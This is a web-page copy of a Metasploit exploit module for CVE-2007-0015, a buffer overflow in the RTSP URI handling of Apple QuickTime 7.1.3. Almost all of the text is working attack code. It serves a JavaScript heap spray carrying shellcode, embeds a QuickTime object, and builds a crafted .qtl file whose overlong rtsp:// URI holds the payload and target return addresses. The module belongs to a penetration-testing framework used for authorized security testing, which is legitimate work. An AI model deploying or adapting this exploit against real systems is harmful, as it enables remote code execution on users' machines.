Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/browser/apple_quicktime_rtsp.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = NormalRanking
8
9
include Msf::Exploit::Remote::HttpServer::HTML
10
11
# include Msf::Exploit::Remote::BrowserAutopwn
12
# autopwn_info({
13
# :os_name => OperatingSystems::Match::WINDOWS,
14
# # No particular browser. Works on at least IE6 and Firefox 1.5.0.3
15
# :javascript => true,
16
# :rank => NormalRanking, # reliable memory corruption
17
# :vuln_test => nil,
18
# })
19
20
def initialize(info = {})
21
super(
22
update_info(
23
info,
24
'Name' => 'Apple QuickTime 7.1.3 RTSP URI Buffer Overflow',
25
'Description' => %q{
26
This module exploits a buffer overflow in Apple QuickTime
27
7.1.3. This module was inspired by MOAB-01-01-2007. The
28
Browser target for this module was tested against IE 6 and
29
Firefox 1.5.0.3 on Windows XP SP0/2; Firefox 3 blacklists the
30
QuickTime plugin.
31
},
32
'Author' => [ 'MC', 'egypt' ],
33
'License' => MSF_LICENSE,
34
'References' => [
35
[ 'CVE', '2007-0015' ],
36
[ 'OSVDB', '31023'],
37
[ 'BID', '21829' ]
38
],
39
'DefaultOptions' => {
40
'EXITFUNC' => 'process',
41
},
42
'Payload' => {
43
'Space' => 500,
44
'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40\x5c",
45
},
46
'Platform' => 'win',
47
'Targets' => [
48
[ 'Automatic', {} ],
49
[
50
'Apple QuickTime Player 7.1.3',
51
{
52
'Ret' => 0x6855d8a2 # xpsp2/2k3 :( | vista ;)
53
}
54
],
55
[
56
'Browser Universal',
57
{
58
'Ret' => 0x0c0c0c0c # tested on xpsp0 and sp2
59
}
60
],
61
],
62
'Privileged' => false,
63
'DisclosureDate' => '2007-01-01',
64
'DefaultTarget' => 0,
65
'Notes' => {
66
'Reliability' => UNKNOWN_RELIABILITY,
67
'Stability' => UNKNOWN_STABILITY,
68
'SideEffects' => UNKNOWN_SIDE_EFFECTS
69
}
70
)
71
)
72
end
73
74
def on_request_uri(client, request)
75
return if ((p = regenerate_payload(client)) == nil)
76
77
if (target.name =~ /Automatic/)
78
if (request['User-Agent'] =~ /QuickTime/i)
79
target = targets[1]
80
else
81
target = targets[2]
82
end
83
end
84
85
cruft = rand_text_alphanumeric(4)
86
# This is all basically filler on the browser target because we can't
87
# expect the SEH to be in a reliable place across multiple browsers.
88
# Heap spray ftw.
89
sploit = rand_text_english(307)
90
sploit << p.encoded + "\xeb\x06" + rand_text_english(2)
91
sploit << [target.ret].pack('V') + [0xe8, -485].pack('CV')
92
93
if (request['User-Agent'] =~ /QuickTime/i or request.uri =~ /\.qtl$/)
94
print_status("Sending exploit QTL file (target: #{target.name})")
95
content = build_qtl(sploit)
96
else
97
print_status("Sending init HTML")
98
99
shellcode = Rex::Text.to_unescape(p.encoded)
100
url = ((datastore['SSL']) ? "https://" : "http://")
101
url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
102
url << ":" + datastore['SRVPORT'].to_s
103
url << get_resource
104
js = <<-ENDJS
105
#{js_heap_spray}
106
sprayHeap(unescape("#{shellcode}"), 0x#{target.ret.to_s 16}, 0x4000);
107
ENDJS
108
content = "<html><body><script><!--\n#{js}//--></script>"
109
content << <<-ENDEMBED
110
<OBJECT
111
CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
112
WIDTH="1"
113
HEIGHT="1"
114
CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab">
115
<PARAM name="SRC" VALUE = "#{url}/#{cruft}.qtl">
116
<PARAM name="QTSRC" VALUE = "#{url}/#{cruft}.qtl">
117
<PARAM name="AUTOPLAY" VALUE = "true" >
118
<PARAM name="TYPE" VALUE = "video/quicktime" >
119
<PARAM name="TARGET" VALUE = "myself" >
120
<EMBED
121
SRC = "#{url}/#{cruft}.qtl"
122
QTSRC = "#{url}/#{cruft}.qtl"
123
TARGET = "myself"
124
WIDTH = "1"
125
HEIGHT = "1"
126
AUTOPLAY = "true"
127
PLUGIN = "quicktimeplugin"
128
TYPE = "video/quicktime"
129
CACHE = "false"
130
PLUGINSPAGE= "http://www.apple.com/quicktime/download/" >
131
</EMBED>
132
</OBJECT>
133
ENDEMBED
134
content << "</body></html>"
135
end
136
137
send_response(client, content, { 'Content-Type' => "text/html" })
138
139
# Handle the payload
140
handler(client)
141
end
142
143
def build_qtl(overflow)
144
cruft = rand_text_english(4)
145
146
content = "<?xml version=\"1.0\"?>\n"
147
content << "<?quicktime type=\"application/x-quicktime-media-link\"?>\n"
148
content << "<embed autoplay=\"true\" \n"
149
content << "moviename=\"#{cruft}\" \n"
150
content << "qtnext=\"#{cruft}\" \n"
151
content << "type=\"video/quicktime\" \n"
152
content << "src=\"rtsp://#{cruft}:#{overflow}\" />\n"
153
end
154
end
155
156